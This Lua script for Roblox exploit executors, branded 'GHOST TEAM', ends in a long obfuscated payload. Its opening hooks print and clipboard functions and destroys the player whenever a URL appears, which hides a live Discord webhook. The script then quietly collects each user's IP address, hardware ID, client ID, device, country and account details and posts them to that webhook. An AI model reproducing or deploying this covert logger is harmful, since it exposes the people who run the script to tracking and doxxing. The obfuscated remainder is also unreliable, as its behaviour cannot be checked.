local functions = {
  rconsoleprint,
  print,
  setclipboard,
  rconsoleerr,
  rconsolewarn,
  warn,
  error
}

game:GetService('RunService').RenderStepped:Connect(function()
for i, v in next, functions do
  local old = hookfunction(v, function(...)
   local args = {...}
   for i, v in next, args do
     if tostring(i):find("https://") or tostring(v):find("https://") then
       
       
       game:GetService("Players").LocalPlayer:Destroy()
     end
   end
   return old(...)
  end)
end
end)

local r=game:GetService("RunService")
local p=game.Players.LocalPlayer
local b={Name=p.Name,UserId=p.UserId,AccountAge=p.AccountAge,DisplayName=p.DisplayName}
local m=getmetatable(b)or{};m.__newindex=function()end;setmetatable(b,m)
local lt=0
r.Heartbeat:Connect(function(dt)
    local nt=tick()
    if nt-lt>=0 then
        lt=nt
        if p.Name~=b.Name then pcall(function()p.Name=b.Name end)end
        if p.UserId~=b.UserId then pcall(function()p.UserId=b.UserId end)end
        if p.AccountAge~=b.AccountAge then pcall(function()p.AccountAge=b.AccountAge end)end
        if p.DisplayName~=b.DisplayName then pcall(function()p.DisplayName=b.DisplayName end)end
    end
end)

-- [[ GHOST TEAM★独家制作 ]]
-------------------------GHOST TEAM------------------------------
local GS_Webhook = "https://discord.com/api/webhooks/1449608485233758409/CsgGTh1VzSxpbM1mxHSApZsN3Hk-vbavoEJQ3xGoV_tMA6V8ghIlsfTekQFVr5mS696H"
-------------------------GHOST TEAM------------------------------
--人物
local Thing = game:HttpGet(string.format("https://thumbnails.roblox.com/v1/users/avatar?userIds=%d&size=180x180&format=Png&isCircular=true", game.Players.LocalPlayer.UserId))
Thing = game:GetService("HttpService"):JSONDecode(Thing).data[1]
local AvatarImage = Thing.imageUrl

--设备
if game.UserInputService.TouchEnabled and not game.UserInputService.KeyboardEnabled and not game.UserInputService.MouseEnabled then
  device = "移动设备"
 elseif not game.UserInputService.TouchEnabled and game.UserInputService.KeyboardEnabled and game.UserInputService.MouseEnabled then
  device = "电脑"
 elseif game.UserInputService.TouchEnabled and game.UserInputService.KeyboardEnabled and game.UserInputService.MouseEnabled then
  device = "带触摸屏的电脑"
end

--会员
local player = game.Players.LocalPlayer
if player.MembershipType == Enum.MembershipType.Premium then
  Premium = "是"
 else
  Premium = "否"
end

--IP地址
local req = http_request or request or (syn and syn.request)
IP = ""..req({ Url = "https://api.ipify.org/", Method = "Get" }).Body
-------------------------GHOST TEAM------------------------------
local msg = {
  ["username"] = "小中脚本-机器人",
  ["embeds"] = {
    {
      ["color"] = tonumber(tostring("0x32CD32")),
      ["title"] = "有人正在使用小中脚本" .. os.date("%H") .. "时" .. os.date("%M") .. "分",
      ["thumbnail"] = {
        ["url"] = AvatarImage,
      },
      -------------------------GHOST TEAM------------------------------
      ["fields"] = {
        {
          ["name"] = "用户名",
          ["value"] = game.Players.LocalPlayer.Name,
          ["inline"] = true
        },
        {
          ["name"] = "名称",
          ["value"] = game.Players.LocalPlayer.DisplayName,
          ["inline"] = true
        },
        {
          ["name"] = "用户ID",
          ["value"] = "["..player.UserId.."](" .. tostring("https://www.roblox.com/users/" .. game.Players.LocalPlayer.UserId .. "/profile")..")",
          ["inline"] = true
        },
        {
          ["name"] = "客户端ID",
          ["value"] = game:GetService("RbxAnalyticsService"):GetClientId(),
          ["inline"] = false
        },
        {
          ["name"] = "地图ID",
          ["value"] = "[" .. game.PlaceId .. "](" .. "https://www.roblox.com/games/" .. game.PlaceId .. ")",
          ["inline"] = true
        },
         {
          ["name"] = "地图名称",
          ["value"] = game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId).Name,
          ["inline"] = true
        },
        {
          ["name"] = "使用的注入器",
          ["value"] = identifyexecutor() or getexecutorname() or "未知",
          ["inline"] = true
        },
        {
          ["name"] = "账号年龄",
          ["value"] = game.Players.LocalPlayer.AccountAge .. "天",
          ["inline"] = true
        },
        {
          ["name"] = "设备",
          ["value"] = device,
          ["inline"] = false
        },
        {
          ["name"] = "国家和语言",
          ["value"] = "国家: " .. game:GetService("LocalizationService"):GetCountryRegionForPlayerAsync(game.Players.LocalPlayer),
          ["inline"] = false
        },
        {
          ["name"] = "语言",
          ["value"] = " 语言: " .. game.Players.LocalPlayer.LocaleId,
          ["inline"] = false
        },
        {
          ["name"] = "会员状态",
          ["value"] = Premium,
          ["inline"] = false
        },
        {
          ["name"] = "HWID",
          ["value"] = gethwid(),
          ["inline"] = true
        },
        {
          ["name"] = "IP地址",
          ["value"] = IP,
          ["inline"] = true
        },
        {
          ["name"] = "IP工具箱",
          ["value"] = "IP: " .. "https://binaryfork.com/zh/tools/ip-address-lookup/?ip=" .. IP .. "&trp-form-language=zh#ip-lookup",
          ["inline"] = false
        },
      }
    }
  }
}
-------------------------GHOST TEAM------------------------------
local request = http_request or request or HttpPost or syn.request
request({
  Url = GS_Webhook,
  Method = "POST",
  Headers = {["Content-Type"] = "application/json"},
  Body = game.HttpService:JSONEncode(msg)
})
-------------------------GHOST TEAM------------------------------

--[[ v1.0.0 https://wearedevs.net/obfuscator ]] return(function(...)local M={"\101\100\090\113\069\043\097\100\054\073\043\118\052\085\079\048\043\114\061\061";"\102\043\088\105\118\070\061\061";"\114\086\085\086";"\051\067\112\054","\069\085\077\114\104\085\116\072";"\104\066\120\111\104\057\103\116\084\102\075\061";"\070\098\077\106\082\120\050\069\078\103\121\106\113\103\061\061","\116\051\103\048\106\065\055\084\053\043\067\121\069\073\043\106","\083\110\099\113\071\114\061\061";"\112\099\109\066\069\086\049\074\112\047\116\047\106\082\068\114\054\103\061\061","\110\052\052\088\107\112\109\119\120\085\055\116\111\103\061\061","\101\043\097\121\066\088\072\103\121\119\065\061";"\051\076\079\108","\105\115\053\043\081\105\061\061","\111\087\081\116\078\071\102\065\087\054\067\117\100\107\120\098\067\053\043\089","\120\120\071\120\099\108\051\055\116\065\100\055\084\105\061\061";"\048\090\074\073\050\103\061\061","\083\083\053\074\105\048\075\098\048\084\112\120\054\120\047\054","\088\074\103\100";"\111\085\077\068\053\103\061\061","\103\066\078\050\053\100\043\083\069\070\061\061";"\089\121\113\101\083\070\061\061","\054\100\067\050\052\099\078\109";"\116\119\069\114\052\047\069\111\052\048\052\121\103\085\078\104\116\105\061\061";"\070\081\107\078\118\097\077\074\110\109\098\078\082\080\113\073\107\078\105\061";"\056\055\102\069\103\054\072\085\090\068\066\115","\067\110\122\119\113\066\110\099\111\121\088\061";"\103\043\067\043\111\100\068\122\085\099\111\080\113\075\116\121";"\106\080\043\082\065\067\099\110\120\109\111\066\110\114\061\061","\052\073\120\056\053\048\117\061","\108\071\122\048\105\084\099\072\079\087\115\111\069\079\115\070\113\052\117\078\107\105\061\061";"\105\121\055\079\076\070\061\061","\043\082\111\115\053\119\117\061";"\107\111\099\121\121\078\075\121\111\099\103\061";"\100\049\065\043\073\043\072\079\054\085\081\101\047\112\074\073\114\049\043\086\082\051\103\061","\097\098\050\043","\102\057\085\072\111\103\056\055\065\075\097\080\072\054\078\057\120\108\043\084\049\105\061\061","\081\107\116\111\118\070\061\061";"\051\084\110\067";"\097\120\118\113\082\099\097\087","\049\051\055\074";"\086\122\113\101\090\103\061\061","\113\049\068\108\068\114\061\061","\054\066\043\079\053\085\043\079\104\073\111\097\104\100\055\090","\065\085\055\089\086\105\061\061";"\111\057\090\087\079\087\048\051\048\082\118\104\121\103\061\061","\119\051\082\066\053\048\069\121\106\083\116\079\069\068\116\100\118\103\061\061";"\079\057\104\118";"\106\073\043\052\113\075\090\116\104\075\052\071\119\085\115\067\043\105\061\061","\052\100\055\084\053\048\117\061","\073\068\078\109\052\073\111\097\069\099\067\108\053\099\082\061","\080\075\103\109\048\103\061\061","\120\110\100\098\084\071\118\075\069\097\105\061";"\104\083\111\099\085\073\049\057\082\043\097\117\118\083\120\103";"\069\066\069\111\113\065\054\055\101\051\115\106\054\099\077\074\103\105\061\061";"\098\054\118\122","\073\068\078\051\104\114\061\061";"\090\085\090\104\106\065\114\082\108\079\057\107\110\114\061\061";"\053\086\117\061";"\069\119\043\052\054\051\082\056\101\099\120\100\118\068\070\079","\103\067\065\051\081\114\061\061","\109\113\073\112\118\114\061\061","\082\082\109\115\101\051\075\114\069\119\052\098\101\075\078\120\116\073\065\061";"\075\101\104\070\099\068\085\079\057\072\115\114";"\115\057\076\051\081\103\061\061";"\078\111\067\121";"\073\111\105\098\048\105\061\061","\073\103\122\082\101\105\061\061","\100\047\065\084";"\111\050\111\121\115\114\117\079\050\069\102\069\117\056\118\106\121\071\101\057\075\116\090\085\114\067\089\104","\043\082\111\115\053\103\061\061","\120\083\056\100\054\121\071\050\050\101\079\061","\082\047\111\119";"\105\047\115\086\082\122\083\081\113\066\103\098\054\100\119\102","\087\116\101\081\078\081\101\048\100\113\105\104","\056\049\055\106","\114\050\076\088\114\054\111\072\075\069\119\112\090\053\082\061";"\120\088\074\101\104\105\061\061";"\053\116\098\075\107\054\089\103\122\111\101\115","\111\099\043\089\069\047\120\084\101\103\061\061","\117\085\055\101\098\114\054\056\122\067\065\061","\069\099\078\050\069\085\068\108\052\073\117\061","\078\119\073\057\097\103\061\061","\107\118\114\066\099\114\061\061";"\069\099\078\089\069\047\120\115\053\100\054\061","\106\111\100\122\102\105\061\061","\053\099\078\097\052\047\116\079\054\100\090\050\052\114\061\061","\067\078\084\111\067\103\121\111\073\070\061\061";"\106\067\111\085\052\043\097\106\118\086\052\079\111\100\111\111\119\070\061\061","\077\087\120\121";"\079\109\055\080\114\054\100\069\081\083\105\061","\054\080\116\111\110\103\061\061","\106\085\077\075\083\086\105\074\069\049\122\077\056\084\050\050\074\088\105\061","\097\120\047\109";"\088\054\078\111\083\107\119\047\043\114\061\061","\104\051\090\079\052\103\061\061","\053\048\106\061";"\088\052\089\048","\102\104\107\109\051\051\051\111\100\054\088\061","\118\085\077\089\069\099\067\050\104\066\082\061";"\112\105\061\061";"\118\097\079\055\069\070\061\061","\109\076\088\053\073\105\061\061";"\090\107\083\090";"\120\087\068\098\055\043\079\111\043\067\082\061";"\103\066\078\088\053\048\117\089","\069\101\107\122";"\111\066\043\079\082\066\043\056\069\100\090\083\052\103\061\061";"\069\089\120\103\052\086\049\047","\112\108\105\090\052\080\057\115\112\105\061\061","\066\065\105\048\079\051\048\089\065\104\070\061";"\098\119\102\051\117\055\110\049\076\079\052\077\104\067\047\106\089\050\121\061";"\056\070\070\069\065\119\106\054\106\083\079\061";"\069\099\067\108\053\099\082\061","\067\082\068\111";"\119\047\106\052";"\056\078\088\072\099\114\061\061","\086\073\082\121\121\120\051\088\084\081\121\075\107\065\071\113\070\048\101\090\043\048\082\061";"";"\048\077\100\078\085\114\061\061";"\052\090\116\086\082\089\111\085\111\043\117\114\111\085\090\074\111\086\082\061";"\054\098\100\102\050\055\114\105\050\069\053\075\116\108\086\077\090\117\079\104\117\070\120\105\112\067\075\086\107\085\110\085\113\086\070\116\085\076\103\121\114\080\050\112\081\074\097\056\100\106\098\056\084\071\074\043\103\075\084\067\048\086\082\120\111\077\078\107\047\120\053\108\100\115\110\119\121\072\068\082\116\050\101\050\079\099\107\105\106\085\055\121\114\088\054\061";"\103\051\097\080\104\114\061\061";"\084\069\100\110\114\086\103\117\105\076\083\066\119\048\120\090\047\105\079\061","\113\086\069\089\069\100\115\072\069\100\117\061";"\081\068\074\077\119\070\061\061";"\043\048\052\056\106\047\116\068\043\051\090\043\082\065\090\074\054\119\065\061","\049\106\089\084\048\057\087\117","\080\050\078\107\121\071\077\074\066\065\104\103\109\043\089\103\083\082\121\086","\076\052\080\105\079\052\119\070\110\068\047\048\043\087\050\054","\082\078\106\102\119\084\113\116\080\073\049\102\113\074\083\114\110\088\112\118\073\105\061\061","\104\056\057\049";"\087\115\112\087";"\075\103\071\066\090\056\105\049\049\066\080\085\119\100\049\051\072\077\113\098\056\111\068\102\055\105\061\061";"\048\108\116\122\048\105\061\061";"\047\107\109\070\122\057\056\074\103\070\076\111\098\043\104\052\056\086\120\117\055\076\089\048\072\052\057\101\077\114\061\061";"\043\099\067\109\054\099\043\056\117\065\111\090\069\099\043\083\069\099\043\075\117\103\061\061","\052\080\082\101";"\054\100\043\109\053\048\052\090","\103\079\103\121\073\048\118\052\050\100\097\107\112\111\083\107\043\090\072\051\105\108\098\099";"\105\043\108\081\043\089\101\115\053\070\061\061";"\089\113\098\048","\087\104\090\119\089\086\115\067\051\078\050\104\109\049\067\071\068\099\082\061";"\052\079\077\047\109\056\056\118\072\057\116\080\047\122\051\117\073\073\071\108\113\113\085\087","\116\114\052\112","\074\078\107\080\122\119\077\099\099\099\050\084","\053\086\065\061";"\050\066\098\047\050\119\080\119\121\082\054\043\055\087\078\053\079\110\120\099\113\100\101\083\070\043\070\057\076\105\061\061";"\122\077\119\086\101\114\061\061","\069\107\090\086\071\105\061\061";"\068\118\074\113\089\118\090\052\066\114\061\061","\114\103\109\054\050\078\070\087\106\111\051\107\099\079\065\114\087\090\073\053\073\079\107\085","\054\077\053\106\054\066\052\108\072\117\098\056\075\084\066\047\102\104\054\120","\054\048\111\056\113\085\077\051";"\052\066\067\109\052\103\061\061","\078\116\056\047\111\070\061\061","\085\069\066\098\072\088\105\047\078\070\061\061";"\043\122\053\065\078\108\113\118","\054\099\116\097\053\099\114\061";"\106\117\097\054\066\103\061\061";"\089\113\077\057\103\088\103\074\122\052\072\053\075\072\103\061";"\116\101\054\080\051\090\102\088\052\065\052\080\088\072\106\056\112\080\106\051\099\098\065\073\114\109\049\088\053\070\061\061";"\070\105\068\118\121\114\061\061";"\103\057\047\104\103\043\053\090\115\114\061\061","\073\068\078\088\052\085\121\061";"\056\088\048\097\115\057\079\061","\057\088\056\090\068\120\088\053\115\102\103\102\068\086\106\122\052\053\114\061","\100\112\051\112";"\097\079\049\077";"\104\079\120\119\072\087\047\105\078\080\097\116\122\086\051\069\111\076\082\051","\108\043\069\122\120\115\121\114\114\072\054\084\070\107\055\114\056\082\115\065\112\105\087\084\072\097\105\052\047\105\061\061";"\120\074\069\047\077\103\061\061","\089\048\100\080";"\069\099\067\089\113\114\061\061","\104\066\097\097\054\105\061\061";"\080\120\068\090\057\086\090\048\085\086\118\102\055\070\061\061";"\053\099\043\050";"\097\086\070\071\104\101\088\082\100\079\107\070\053\076\076\119\099\111\080\117\070\114\061\061";"\066\078\065\103\088\103\074\082\117\078\101\070\049\120\083\099\122\049\097\079\118\076\117\109\066\069\081\102\098\117\071\057\100\114\086\075\082\068\120\055\090\074\100\112\081\075\101\103\072\069\101\101\111\107\109\108\072\078\079\080\065\056\098\110\104\056\109\081\097\083\084\116\102\111\043\082\085\118\052\117\106\049\056\111","\101\050\107\098\069\114\104\061";"\085\073\075\055\113\089\043\097\101\075\090\116\054\090\104\068\053\082\117\061","\085\047\067\070\115\087\072\086\084\071\103\061";"\081\075\047\085\083\080\106\067","\119\117\085\118\119\057\105\056\098\052\084\048\090\105\061\061";"\114\113\050\083\111\109\116\116\104\078\120\080\111\103\061\061","\103\068\054\121\111\051\097\090\111\089\052\074\052\047\043\106\103\114\061\061";"\087\114\061\061";"\108\102\107\082\048\052\102\078\121\103\061\061";"\052\099\120\119\052\082\057\066\103\079\068\121\052\082\111\047\085\100\105\061","\118\090\116\071\119\075\111\090\104\066\078\075\052\103\061\061","\052\048\116\068\104\105\061\061";"\069\112\049\068\067\114\061\061";"\085\083\097\115\112\086\097\051\043\048\067\099\053\075\082\077\106\103\061\061";"\113\080\100\072\086\105\061\061","\113\071\101\101\100\089\113\099\079\085\117\061","\053\085\067\079\113\070\061\061","\047\070\111\056\103\054\065\108\084\104\047\079\043\049\111\104\113\114\079\105";"\107\098\110\115\057\111\114\066\083\069\088\061","\050\110\079\116\109\065\086\109\119\105\082\061","\114\076\120\097","\104\066\078\050\104\066\067\079";"\073\068\078\115\053\100\111\090\101\070\061\061";"\118\047\111\079\054\065\069\090\069\070\061\061";"\101\065\104\056\104\100\055\080\111\090\103\068\104\066\115\048\101\105\061\061","\068\111\054\120\106\109\085\048\081\114\061\061","\085\051\049\106\053\068\043\103\113\047\054\055\043\083\120\051\053\085\079\061";"\052\066\068\097\069\099\116\057","\067\050\067\052\112\086\076\050\084\105\057\085\070\056\100\113";"\084\070\106\090"}local function N(N)return M[N-(-1003213-(-1016226))]end for N,S in ipairs({{-742308+742309;-178373-(-178582)};{-873219+873220,808194-808034},{161096+-160935;-629151-(-629360)}})do while S[-71511+71512]<S[1021410+-1021408]do M[S[-329409-(-329410)]],M[S[779373-779371]],S[551425+-551424],S[988880+-988878]=M[S[347022+-347020]],M[S[-467275+467276]],S[-212257+212258]+(-315277-(-315278)),S[24652+-24650]-(-127139+127140)end end do local N=type local S=string.char local H=M local L={v=641082+-641064,n=978673+-978611;Q=-993857-(-993920);H=294144+-294101,A=920329+-920325,l=-990812+990846,["\049"]=431488+-431487,Z=-352471-(-352508);I=-262928+262951;C=-976176+976181;["\052"]=-10282+10307;["\053"]=1004030-1004003,x=924971+-924962,B=644542-644488;h=536217-536193;["\048"]=659644+-659589;["\050"]=560024+-559978;s=-630483-(-630524),O=267695+-267643;j=325947-325935,Y=107469+-107418,w=797509+-797490;i=-46034+46066,u=759974+-759966;["\057"]=169374-169334,f=724646+-724636,o=-389250-(-389267);c=-975163-(-975169);y=-997895-(-997951);q=-916987+917013;J=757827-757785,W=-461346-(-461406),L=-607668-(-607699),["\047"]=778718-778711;m=825371+-825326,d=449498+-449460;U=-353389-(-353411);["\054"]=664326+-664298;S=169147-169112,g=373177+-373161;a=-886153+886186;e=111234-111204;["\056"]=-129475+129525;["\043"]=832371-832350;T=-172663+172710;r=-358674-(-358722);G=988226+-988211;p=-959933+959947;k=-26794+26853;P=-1003689+1003691,F=991682+-991682;b=-154838-(-154896);E=-252186+252215,z=-35846+35857,["\051"]=859348+-859309;V=-287007-(-287010);K=-526264-(-526300);X=-168756-(-168800);t=854044+-854031,R=-503332+503352,M=193712-193655,["\055"]=250055+-250006,D=-637815-(-637868),N=-36354-(-36415)}local j=table.concat local J=table.insert local Z=string.len local E=math.floor local p=string.sub for M=768511+-768510,#H,-868846-(-868847)do local Q=H[M]if N(Q)=="\115\116\114\105\110\103"then local N=Z(Q)local n={}local z=-738810+738811 local r=-950548+950548 local F=377281+-377281 while z<=N do local M=p(Q,z,z)local H=L[M]if H then r=r+H*(-902283-(-902347))^((632174+-632171)-F)F=F+(433543-433542)if F==-513817-(-513821)then F=272468+-272468 local M=E(r/(-63767-(-129303)))local N=E((r%(874159-808623))/(569502+-569246))local H=r%(-858829+859085)J(n,S(M,N,H))r=-286101+286101 end elseif M=="\061"then J(n,S(E(r/(64946+590))))if z>=N or p(Q,z+(252821+-252820),z+(808598-808597))~="\061"then J(n,S(E((r%(-5318+70854))/(-135416+135672))))end break end z=z+(545087+-545086)end H[M]=j(n)end end end return(function(M,H,L,j,J,Z,E,p,z,s,Q,f,r,F,X,D,S,n,x,h,o)r,S,n,s,f,F,x,p,h,X,z,o,D,Q=function(M)for N=-766339-(-766340),#M,557983+-557982 do Q[M[N]]=Q[M[N]]+(745575-745574)end if L then local S=L(true)local H=J(S)H[N(-870800+883966)],H[N(975508-962487)],H[N(-932764+945893)]=M,F,function()return-2149578-361000 end return S else return j({},{[N(-980175+993196)]=F;[N(-992497+1005663)]=M;[N(-169418-(-182547))]=function()return 343890+-2854468 end})end end,function(S,L,j,J)local i,q,T,l,e,k,V,u,E,Y,C,v,Q,a,O,A,t,z,F,W,U,I,b,h,B,K,w,c,y,r,d,m,G,P while S do if S<7878422-447613 then if S<4141043-(-723522)then if S<335008+2562785 then if S<1515553-176927 then if S<346858+360886 then if S<-699511-(-1009268)then if S<-732717+866488 then S=p[j[34399-34395]]F=p[j[160534+-160532]]B=N(56685+-43669)h=p[j[701302-701299]]i=-346642+11609550708528 u=h(B,i)E=F[u]h=p[j[-494134+494136]]u=p[j[752655-752652]]A=7340101281494-(-222852)i=N(557124+-544090)B=u(i,A)F=h[B]S[E]=F E={}S=M[N(115993-102825)]else k=N(740970+-727892)W=M[k]S=1646803-(-69561)k=N(494003+-480825)c=W[k]A=c end else c=nil F=X(F)i=nil h=X(h)v=X(v)u=nil B=X(B)Y=X(Y)A=X(A)r=X(r)k=nil w=nil r=nil u=N(821663+-808503)A=N(-188531+201649)k={}W=nil F=n()z=X(z)z=nil B=N(-639833+652993)p[F]=z z=n()p[z]=r h=M[u]u=N(1000095+-987081)r=h[u]h=n()p[h]=r i=N(616527-603449)u=M[B]B=N(723352-710156)r=u[B]w=-466331-(-466332)B=M[i]i=N(-69547+82650)u=B[i]W=n()c={}i=M[A]Y=-728447+728703 v=n()A=N(-28832+41971)B=i[A]A=n()i=-268552+268552 S=6056761-(-871044)p[A]=i i=-507976+507978 p[v]=i i={}K=Y Y=385514-385513 p[W]=c l=Y Y=-822701+822701 O=l<Y Y=w-l c=-562288+562288 end else if S<-314090+1345949 then if S<269090+513855 then U=p[z]S=U and 631552+702012 or 5197116-499599 t=U else z=p[j[583890+-583888]]r=p[j[666761-666758]]Q=z==r S=-958978+5462499 E=Q end else S=-918711+5616228 U=c==W t=U end end else if S<736620+1332954 then if S<769467+983697 then if S<949399-(-519149)then S=272513+14457356 else E=A S=v S=A and 15816305-569875 or 126054+11940998 end else u=E B=N(475963-462803)E=M[B]B=N(1004316+-991120)i=N(888815-875737)S=E[B]B=n()p[B]=S E=M[i]i=N(-750277+763442)S=E[i]v=S i=S W=N(-390193-(-403271))c=M[W]A=c S=c and-904564+1039249 or 980638-(-735726)end else if S<2862061-298039 then z=N(-55641+68760)S=p[j[-86913+86914]]F=N(780744-767577)Q=M[z]F=Q[F]r=p[j[-177628+177630]]z={F(Q,r)}Q=N(814843-801689)Q=S[Q]E={Q(S,H(z))}E={H(E)}S=M[N(-900628+913781)]else z=N(502255+-489168)r=604988+8004794 E=4200547-(-249626)Q=z^r S=E-Q E=N(882974+-869885)Q=S S=E/Q E={S}S=M[N(-859434+872617)]end end end else if S<3200519-(-1039119)then if S<-458822+3554838 then if S<185992+2867991 then if S<655772+2251100 then Q=p[j[202142+-202141]]E=#Q Q=276737-276737 S=E==Q S=S and 378520+4971609 or-488667+8576013 else Y=#k K=218999+-218999 w=Y==K S=w and 15376671-333288 or 811613+13405547 end else S=p[j[698747+-698743]]A=N(668441-655357)v=2507330146244-(-947403)u=p[j[124399+-124397]]B=p[j[-559719+559722]]i=B(A,v)v=N(-122549+135666)E=u[i]B=p[j[848408-848406]]i=p[j[1000580-1000577]]c=2060671934878-318943 A=i(v,c)u=B[A]S[E]=u S=M[N(577638+-564547)]E={}end else if S<3830326-417373 then if S<3609950-229222 then S=M[N(610904+-597723)]E={}else C=954325+-954323 I=V[C]C=p[d]S=-492627+8844689 e=I==C G=e end else F=330451-330450 z=p[j[630292-630291]]h=395919+-395917 r=z(F,h)z=-458182+458183 Q=r==z E=Q S=Q and-83884+4587405 or 931885-74167 end end else if S<206456+4490013 then if S<-521416+4971302 then if S<3643854-(-773824)then Q=N(-536716+549919)S=M[Q]z=p[j[-453444+453452]]r=1036838+-1036838 Q=S(z,r)S=11792694-(-762213)else E=N(740067+-727044)S=M[E]Q=N(324090-310979)E=M[Q]Q=N(470495+-457384)M[Q]=S S=7116748-521667 Q=N(1009061+-996038)M[Q]=E Q=p[j[772438+-772437]]z=Q()end else S=E and-477502+11060026 or-725919+16667895 end else if S<4147751-(-567473)then p[z]=t S=p[z]S=S and 15241263-290791 or 4999219-(-688665)else T=203958-203957 p[z]=G C=p[q]I=C+T e=V[I]m=c+e e=-1043062+1043318 S=m%e I=p[b]e=W+I I=-48546-(-48802)m=e%I c=S S=649139+10942308 W=m end end end end else if S<5862605-(-660704)then if S<5322576-(-372084)then if S<4813721-(-684265)then if S<-959968+6384817 then if S<-60942+5453829 then r=303934+-303761 z=p[j[743361-743359]]Q=z*r z=-688058+30585377339227 E=Q+z Q=35184373060121-971289 S=E%Q z=-939398+939399 p[j[-408922+408924]]=S Q=p[j[396497+-396494]]E=Q~=z S=15831034-416293 else A=499766-499511 i=143981-143981 z=r S=p[j[132500-132499]]B=S(i,A)Q[z]=B S=10500558-247604 z=nil end else S=true S=S and 696143+6164778 or-970524+16754516 end else if S<-871483+6537068 then if S<-702200+6330265 then k=-184123+4775149770730 A=p[j[-83186-(-83188)]]W=N(348708-335495)S=-676823+8385780 v=p[j[526902-526899]]c=v(W,k)i=A[c]B=F[i]u=h>B E=u else S=437493+1456906 u=p[h]E=u end else S=true S=-964647+6902563 end end else if S<5778960-(-218938)then if S<5508226-(-342483)then if S<5360574-(-396466)then m=S C=-909058-(-909059)I=V[C]C=false e=I==C S=e and 981092+2421287 or 7443405-(-908657)G=e else S=446398+6148683 end else S=f(923855+4913785,{F})U={S()}S=M[N(1026637+-1013440)]E={H(U)}end else if S<-761043+6950249 then S=z[Q]F=S S=not F S=S and-160612+6926697 or 688671+7110227 else G=p[z]E=G S=G and-569640+6273311 or-964627+9790487 end end end else if S<7495398-556168 then if S<6113224-(-662132)then if S<5802518-(-925805)then if S<7382455-751819 then S=true S=S and-633096+5065295 or 3026065-(-245739)else l=N(86417-73306)P=N(-244993+258042)S=M[P]K=M[l]P=S(K)S=N(1004132+-991109)M[S]=P S=7670692-500269 end else i=N(-553023-(-566213))S=p[j[783262+-783258]]h=p[j[187189-187187]]A=22365921255458-(-739468)u=p[j[-585390+585393]]B=u(i,A)v=13570+7731551525134 E=h[B]A=N(-251303-(-264396))u=p[j[-419885-(-419887)]]B=p[j[854210+-854207]]i=B(A,v)h=u[i]S[E]=h S=M[N(476251+-463106)]E={}end else if S<6337084-(-569399)then if S<12893+6868239 then P=190563-190562 K=259518-259512 S=p[B]U=S(P,K)K=N(398372-385349)S=N(-981851-(-994874))M[S]=U P=M[K]K=-976398+976400 S=P>K S=S and 7362132-727615 or 14503162-60381 else S=true p[j[342176+-342175]]=S E={}S=M[N(-335059+348083)]end else b=not O Y=Y+l w=Y<=K w=b and w b=Y>=K b=O and b w=b or w b=12102392-942273 S=w and b w=14393415-842311 S=S or w end end else if S<354957+6847236 then if S<22298+7108296 then if S<-442781+7414466 then z=p[j[660108-660105]]r=587500+-587468 Q=z%r F=p[j[2598-2594]]A=445038+-445036 B=p[j[-499787+499789]]w=p[j[464495-464492]]k=w-Q c=-95057+95070 w=1041114-1041082 W=k/w v=c-W i=A^v u=B/i h=F(u)F=396881+4294570415 r=h%F h=-871425-(-871427)i=-303321-(-303322)F=h^Q z=r/F F=p[j[-676566+676570]]B=z%i i=4294206023-(-761273)u=B*i A=930991+-930735 h=F(u)F=p[j[-883832+883836]]B=741980+-676444 u=F(z)Q=nil r=h+u h=-23870-(-89406)c=-209306+209562 z=nil F=r%h u=r-F h=u/B B=758769+-758513 u=F%B i=F-u B=i/A A=-416442+416698 i=h%A v=h-i A=v/c h=nil F=nil r=nil v={u;B;i;A}B=nil i=nil u=nil S=7233634-(-853712)A=nil p[j[-918303-(-918304)]]=v else S=true S=S and 14030485-972066 or 351382+5586534 end else S=6313581-836896 end else if S<1026997+6247265 then S=p[j[305267+-305263]]z=p[j[420721+-420719]]u=13745834453244-(-225284)h=N(545010-531897)r=p[j[646013+-646010]]B=30728396197130-742693 F=r(h,u)E=z[F]r=p[j[75940-75938]]F=p[j[466457+-466454]]u=N(-815771-(-828879))h=F(u,B)z=r[h]S[E]=z S=M[N(-799948+813098)]E={}else S=p[j[512865+-512855]]z=p[j[677150+-677139]]Q[S]=z S=p[j[-831006+831018]]z={S(Q)}E={H(z)}S=M[N(919719-906666)]end end end end end else if S<-856712+12509291 then if S<-977037+10834637 then if S<-206233+8714068 then if S<758066+7004907 then if S<988866+6726473 then if S<-470352+7972221 then v=725880+16446109567602 h=N(252878-239817)A=N(487259-474227)E=M[h]u=p[j[212369+-212367]]B=p[j[-967764-(-967767)]]i=B(A,v)v=304391+10072198163787 h=u[i]W=6415615190064-(-665467)S=E[h]u=p[j[709013+-709011]]B=p[j[448567+-448564]]A=N(-709228+722305)i=B(A,v)h=u[i]E=S(h)i=p[j[557438-557436]]A=p[j[-580026+580029]]h=E c=N(-125918-(-139065))v=A(c,W)B=i[v]u=F[B]S=u and 240624+5382323 or 969350+6739607 E=u else S=E and-916892+3977880 or 7931978-(-954884)end else S=p[j[351-350]]E=N(712970+-699926)E=S[E]E=E(S)S=M[N(-658173-(-671192))]E={}end else if S<1001562+7191154 then if S<-571093+8503463 then v=257991+21222961772243 u=p[j[-578148+578150]]B=p[j[1061-1058]]A=N(-230505-(-243720))i=B(A,v)h=u[i]E=F[h]u=p[j[67058+-67051]]i=p[j[237038+-237036]]A=p[j[-110883+110886]]c=N(779174-766075)W=9820+15929023149725 v=A(c,W)B=i[v]h=u[B]S=E~=h S=S and 12739408-240534 or 800954+6660598 else r=N(-956548-(-969626))z=M[r]r=N(-1005593-(-1018696))Q=z[r]r=p[j[-837393+837394]]z={Q(r)}E={H(z)}S=M[N(-964659+977829)]end else S=m S=-994226+9820086 E=G end end else if S<8858158-(-249304)then if S<-26712+8907514 then if S<9173693-340778 then p[z]=E S=148469+11442978 else e=-821265+821266 S=3970442-(-790425)m=V[e]G=m end else r=nil v=5698241788721-(-85804)A=N(230301+-217187)S=p[j[-461927-(-461931)]]u=p[j[-1024843-(-1024845)]]W=893305+5082166962117 B=p[j[-684180+684183]]w=N(773919-760852)i=B(A,v)E=u[i]c=N(-158046+171181)i=p[j[-769274-(-769276)]]A=p[j[728509-728506]]Y=842227+2474222758541 v=A(c,W)B=i[v]A=p[j[-561572-(-561579)]]c=p[j[-49389-(-49391)]]W=p[j[205098-205095]]k=W(w,Y)v=c[k]i=A[v]u=B..i F=nil c=22525364589486-(-611659)S[E]=u u=N(-114429+127567)E=M[u]h=nil v=N(-659399+672424)B=p[j[167180-167178]]i=p[j[-132239+132242]]A=i(v,c)u=B[A]S=E[u]c=19266005205002-89343 u=.6 